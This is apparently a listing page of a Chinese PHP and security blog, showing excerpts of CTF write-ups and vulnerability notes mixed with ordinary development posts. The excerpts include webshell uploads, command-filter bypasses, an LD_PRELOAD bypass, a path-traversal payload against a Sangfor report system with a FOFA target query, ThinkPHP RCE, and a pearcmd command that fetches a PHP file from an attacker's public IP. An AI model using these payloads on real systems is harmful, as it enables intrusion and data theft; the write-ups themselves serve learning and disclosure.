PHP

谈了千百遍的数据一致性

今天来说一个老生常谈的问题,来看一个实际案例: 现有业务中往往都会通过缓存来提高查询效率,降低数据库的压力,尤其是在分布式高并发场景下,大量的请求直接访问Mysql很容易造成性能问题。 有一天老板找到了你...... 老板:听说你会缓存? 你:来看我操作。 你设计了一个最常见的缓存方案,基于这种方案,开始对用户积分功能进行优化,但当你睡的正酣时,系统悄悄进行了下面操作: 1、线程A根据业务会把用

BUUCTF-(GXYCTF2019)Ping Ping Ping

它过滤了很多的字符,所有在命令执行的时候就需要绕过这些检测方式,这也是值得学习的点。 首先就是绕过空格的方法: 这个题目中的变量$a可以利用,但仅限于这题! 方法二: ls的结果当成cat的参数

CTFHUB-文件上传

无验证: 直接创建一句话木马并命名为shel.php然后直接上传,shell管理工具连接url+upload/shell.php,密码为ksk; 一句话木马: 前端验证 将php改成jpg后缀,在改包工具中修改后缀为php即可! 文件头检测 文件类型不正确, 只允许上传 jpeg jpg png gif 类型的文件 用terminal来copy不行,powershell也不可以,但是使

CTFHUB-HTTP协议

请求方式 题目给出提示: 修改请求头为CTFHUB: 方法一: 方法二: 302跳转 点击跳转到的页面是302的,然后有重定向到当前页面index.php Cookie 拦截数据包可以发现题目给的Cookie是admin=0;把0改成1就得到了flag Cookie: admin=1 基础认证 使用burp爆破,添加标记点,然后导入字典,设置爆破选项,然后进行爆破! 思考:如

CTFHUB-Web进阶-JSON Web Token

基础知识 JWT原理 JWT 的原理是,服务器认证以后,生成一个 JSON 对象,发回给用户,就像下面这样。 以后,用户与服务端通信的时候,都要发回这个 JSON 对象。服务器完全只靠这个对象认定用户身份。为了防止用户篡改数据,服务器在生成这个对象的时候,会加上签名(详见后文)。 服务器就不保存任何 session 数据了,也就是说,服务器变成无状态了,从而比较容易实现扩展。 JWT有三部分组成

CTFHUB-RCE

eval执行 eval函数是执行php代码的函数, system()函数的主要功能是在系统权限允许的情况下执行系统命令。 文件包含 strpos() 函数查找字符串在另一字符串中第一次出现的位置。 参数 描述 string 必需。规定要搜索的字符串。 find 必需。规定要查找的字符串。 start 可选。规定在何处开始搜索。 主页源码显示get参数为

CTFHUB-Web进阶-PHP-Bypass disable_functions

LD_PRELOAD 页面源码: eval.c 得到: 在/var/www/html/下,新建shell.php 访问:url/?ant=include(%27eval.php%27); 在/temp/目录中刷新就可以得到eval.txt文件,内包含flag。 原理: LD_PRELOAD,是个环境变量,用于动态库的加载,动态库加载的优先级最高,一般情况下,其加载顺序为LD_PRELOAD

ctfshow-warmup

参数 描述 filename 必需。要进行高亮处理的 PHP 文件的路径。 return 可选。如果设置 true,则本函数返回高亮处理的代码。 参数 描述 path 必需。规定要检查的路径。 process_sections 可选。规定要返回的数组元素。默认是 all。可能的值:PATHINFO_DIRNAME - 只返回 dir

ASP.NET 支持 超大上G,多附件上传

​  IE的自带下载功能中没有断点续传功能,要实现断点续传功能,需要用到HTTP协议中鲜为人知的几个响应头和请求头。   一. 两个必要响应头Accept-Ranges、ETag         客户端每次提交下载请求时,服务端都要添加这两个响应头,以保证客户端和服务端将此下载识别为可以断

PhysX 和 NavMesh 在服务器的应用

https://cloud.tencent.com/developer/article/1006053 一、 引言 本文源于一个简单的想法 “在LINUX服务器进程中,加载Unity搭建的场景,并驱动AI在客户端的行为”,这个想法引发了一系列的思考: 物理引擎的选择 如何从Unity导出场景 如何用PhysX加载场景,并验证其正确性 如何驱动AI寻路 等等 带着上面的问题,作者花了大概两

c#.net 支持 超大上G,多附件上传

​  以ASP.NET Core WebAPI 作后端 API ,用 Vue 构建前端页面,用 Axios 从前端访问后端 API ,包括文件的上传和下载。   准备文件上传的API   #region 文件上传  可以带参数   &nbs

Bugku-聪明的php

smarty模板注入常用的payload 常用payload 随便传参可以发现有东西出来 可以发现这个被计算了,说明可以利用,但是有很多参数都被过滤了 可以使用的是参数有passthru,参数利用发现内容 查看start.sh可以看到代码内容 倒叙排列的而已

深信服应用交付报表系统download.php任意文件读取漏洞

漏洞描述 深信服 应用交付报表系统download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。 漏洞影响 深信服 应用交付报表系统 漏洞复现 fofa搜索环境复现:app="SANGFOR-应用交付报表系统" 登录页面: payload:/report/download.php?pdf=../../../../../etc/passwd nuclei批量yaml文件

读代码,有关PHP知识,

  通过 require_once 语句,可以将一个 PHP 脚本的内容引入另一个 PHP 脚本。如果在 require_once 引入某脚本之前已经引入名字相同的脚本,则 require_once 不会执行该引入操作。当 require_once 语句发生错误的时候,PHP 会生成致命错误(E_COMPILE_ERROR)并终止脚本,即不会再继续执行后面的代码。还有一个功能就是避免变量重复初始化

DOYO DAMI网站挖洞实况

DOYO DAMI网站挖洞实况 DOYO 先打开网站DOYO,逛一逛前端页面 直接在路径后面拼接admin.php尝试登录后台,发现成功 通过爆破得到的账号admin密码123456进入后台管理系统 这时,我们再注册一个账号 购买一件女士原创纯羊绒,尺码M,颜色蓝色,使用线下支付的方式 记下它的订单号16932821320000000260 再购买一份中国联通充值卡(30元) 记下它的订

SQL注入基础学习7(续集2)

四、一些绕过技术 11、分块传输绕过 11.1、定义 分块传输(也称为Chunked Transfer Encoding)是一种HTTP协议的特性,它允许将HTTP响应分成多个块进行传输,而不是一次性传输整个响应。这在某些情况下可以提高性能和响应时间。然而,攻击者有时会尝试利用分块传输来绕过一些安全控制,包括防止SQL注入攻击。 11.2、使用 在HTTP头部,使用Transfer-Encodin

[GDOUCTF 2023]受不了一点

[GDOUCTF 2023]受不了一点 题目来源:nssctf 题目类型:web 涉及考点:PHP弱比较 1. 直接做代码审计 一个个看吧,第一个if,要求POST传入两个参数gdou和ctf,且两者值不相等,但md5值相等。 这里涉及到md5绕过,对于要求md5强相等的题目,这里给出一对碰撞: 这里介绍另一种方法,数组绕过 即在php中,函数md5($a)内,若$a是一个数组,则函数

LNMP

目录1. 安装nginx1.1 安装依赖包1.2 创建运行用户、组1.3 编译安装nginx2. 安装mysql2.1 安装Mysql环境依赖包2.2 创建运行用户2.3 编译安装2.4 修改mysql 配置文件2.5 更改mysql安装目录和配置文件的属主属组2.6 设置路径环境变量2.7 初始化数据库2.8 添加mysqld系统服务2.9 修改mysql的登录密码2.10 授权远程登录3. 安

dedebiz发布文章自动提交到百度搜索的方法

修改程序文件 依次打开/admin/article_add.php和article_edit.php 找到ClearMyAddon($id, $title); 在其上面加入 //自动提交到百度 else{ $urls[]='http://www.baidu.com/'.$artUrl; $api = 'http://data.zz.baidu.com/urls?site=www

CTFshow 萌新web22

源代码 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload: http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php: <?php echo"<?php system('tac 36d.php');?>"; ?> 上传成功后显示: 最后访问1.p

Linux常见启动引导程序和系统引导启动过程

一、常见启动引导程序 https://www.php.cn/faq/572887.html linux引导程序有3种: 1、LILO,一种过去常用的引导程序,主要特点是简单、可靠,但它不能识别较大的硬盘和文件系统; 2、GRUB,目前较为流行的引导程序,具有强大的功能和灵活性,支持多个操作系统的引导; 最常用的是GRUB https://blog.csdn.net/c_base_jin/

Ueditor编辑器 从word中复制内容带多张图片

​  由于工作需要必须将word文档内容粘贴到编辑器中使用 但发现word中的图片粘贴后变成了file:///xxxx.jpg这种内容,如果上传到服务器后其他人也访问不了,网上找了很多编辑器发现没有一个能直接解决这个问题 考虑到自己除了工作其他时间基本上不使用windows,因此打算使用nodejs来解决这一问题 发现不管什么编辑器只要将图片转换成base64后就可以直接使用(IE8及一

Bugku-Web11

没啥思路,在这个网站上不能右键弹出属性框,F12查看也没啥可看的,所以就去看了看评论, 大概的套路有了,就只有实践了 先安装dirsearch: https://github.com/maurosoria/dirsearch 进入GitHub下载zip包,我拖到了kali里面安装,因为在wndows中解压输入命令就弹出dirsearch.py的文本文件,做完这个题目得去找找原因。 安装完成后

Bugku-Web14

php://filter/read=convert.base64-encode/resource=index.php

thinkphp5 日期+group by + 分页paginate查询

 原数据 FROM_UNIXTIME之后的数据 group by 后的数据  

百度Ueditor 从word中复制内容带多张图片

​ 图片的复制无非有两种方法,一种是图片直接上传到服务器,另外一种转换成二进制流的base64码 目前限chrome浏览器使用 首先以um-editor的二进制流保存为例: 打开umeditor.js,找到UM.plugins['autoupload'],然后找到autoUploadHandler方法,注释掉其中的代码。 加入下面的代码: //判断剪贴板的内容是否包含文本 //首先解释一下为什么要

系统运维的工作具体做什么?(每天的工作----------掌握)

系统运维日常巡检都做什么 原创 六便士IT 六便士IT 2023-07-25 11:00 发表于陕西 收录于合集#Linux运维34个 系统运维日常巡检是确保服务器和系统正常运行的关键活动。它涉及对硬件、软件和网络进行定期检查,以发现潜在问题并采取相应的措施。以下是系统运维日常巡检的一些常见任务: 1.硬件检查: 检查服务器硬件的健康状态,包

银河麒麟V10 SP2 auditd服务内存泄露问题

这几天遇到基于海光服务器的银河麒麟V10 SP2版本操作系统出现内存无故增长问题。 排查发现auditd服务,占用了大量内存。 我的环境是银河麒麟V10 SP2 524,audit版本audit-3.0-5.se.06 分析auditd服务存在内存泄露问题,位置在/usr/lib64/libaudit.so.1.0.0的get_file_sys_info处,malloc以后未释放。 aud

5.1.29 远程代码执行漏洞

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞 漏洞描述 Thinkphp是一个国内轻量级的开发框架。由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 验证方式 利用方式 一句话木马 上传一句话木马 使用蚁剑连接 http://10.10.10.154/shell.php

DEDEBIZ禁止发布重复标题文章的方法

修改文件位置 /admin/article_add.php 找到 if (empty($click)) $click = ($cfg_arc_click == '-1' ? mt_rand(1000,6000) : $cfg_arc_click); 在此段代码下面添加  //检测文档是否重复 if ($cfg_mb_cktitle == 'Y') { $row = $dsql-&g

<<  <  86  87  88  89  90  91  92  93  94  95  96  >  >>